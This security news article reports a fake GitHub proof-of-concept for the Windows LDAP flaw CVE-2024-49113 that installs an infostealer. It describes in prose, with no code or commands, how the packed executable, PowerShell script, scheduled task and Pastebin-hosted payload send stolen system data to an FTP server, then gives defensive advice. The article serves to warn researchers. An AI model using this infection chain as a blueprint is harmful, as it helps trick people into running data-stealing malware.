In a shocking revelation, security experts from Trend Micro have uncovered a deceptive proof-of-concept (PoC) exploit for CVE-2024-49113, also known as "LDAPNightmare," hosted on GitHub that spreads infostealer malware. This malicious tool lures unsuspecting users with promises of legitimate testing capabilities, only to infect their systems and exfiltrate sensitive data to an external FTP server.

This troubling tactic is not new, as a variety of malicious applications have previously masqueraded as PoC exploits on GitHub. However, the newly discovered case underscores a persistent trend among cybercriminals who cleverly exploit user trust to propagate malware.

The Deceptive Strategy

Trend Micro's investigation revealed that the deceptive GitHub repository appears to have been forked from a legitimate PoC provided by SafeBreach Labs, who originally released their research on January 1, 2025, regarding CVE-2024-49113. This vulnerability is part of two flaws affecting the Windows Lightweight Directory Access Protocol (LDAP), with another critical flaw identified as CVE-2024-49112, which allows for remote code execution.

In a twist, SafeBreach initially misidentified the nature of their PoC in an earlier blog post, mixing up the vulnerabilities, which led to increased public interest in LDAPNightmare. Cybercriminals have leveraged this confusion to deceive users into downloading their malicious software.

The Malicious Payload

Users who download the exploit from the fake repository are greeted with a UPX-packed executable named 'poc.exe'. Upon execution, this executable drops a PowerShell script into the victim's temporary folder. This script sets up a scheduled task on the compromised machine that runs an encoded script, which fetches a third script from the popular code-sharing site, Pastebin.

The final payload is alarming, as it methodically collects a variety of sensitive information including system data, process lists, directory structures, IP addresses, and installed updates—eventually packaging the stolen data into ZIP files before transmitting it to a hardcoded external FTP server.

Protect Yourself!

Cybersecurity experts strongly advise users seeking public exploits for research or testing purposes to exercise extreme caution. When browsing repositories, it’s essential to verify the authenticity of the source—especially since some threat actors have been known to impersonate reputable security researchers.

To mitigate risks, always review any code before execution, utilize services like VirusTotal to scan binaries, and steer clear of any suspicious or obfuscated files.

Stay Informed

For those wanting to gauge the extent of this threat, a list of indicators of compromise related to this attack is available through various cybersecurity channels. Remember, while researching exploits is vital for security improvement, trusting the wrong source can lead to disastrous consequences. Stay safe and validate before you act!